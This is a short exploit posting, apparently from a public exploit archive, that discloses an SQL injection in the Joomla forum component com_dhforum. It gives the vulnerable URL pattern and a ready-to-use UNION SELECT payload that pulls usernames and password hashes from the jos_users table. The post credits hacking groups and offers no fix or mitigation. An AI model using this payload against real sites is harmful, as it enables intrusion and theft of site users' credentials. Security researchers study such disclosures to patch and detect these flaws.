==============================================================================
======
[»] Joomla Component com_dhforum SQL Injection Vulnerability
========================================================================
 
======
 
[»] Script: [ joomla Component ]
[»] Language: [ PHP ]
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to: [ HackTeach Team ,Egyptian Hackers ,All My Friends &pentestlabs.com ]
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
 
###########################################################################
 
===[ Exploit ]===
 
[»] http://[target].com/[path]/index.php?option=com_dhforum&view=grouplist&id=[SQL]
 
 
 
===[ Live Demo ]===
 
[»] http://server/index.php?option=com_dhforum&view=grouplist&id=-1+union+select+concat
 
(username,0x3a,password)+from+jos_users--
 
Author: ViRuSMaN <-
 
###########################################################################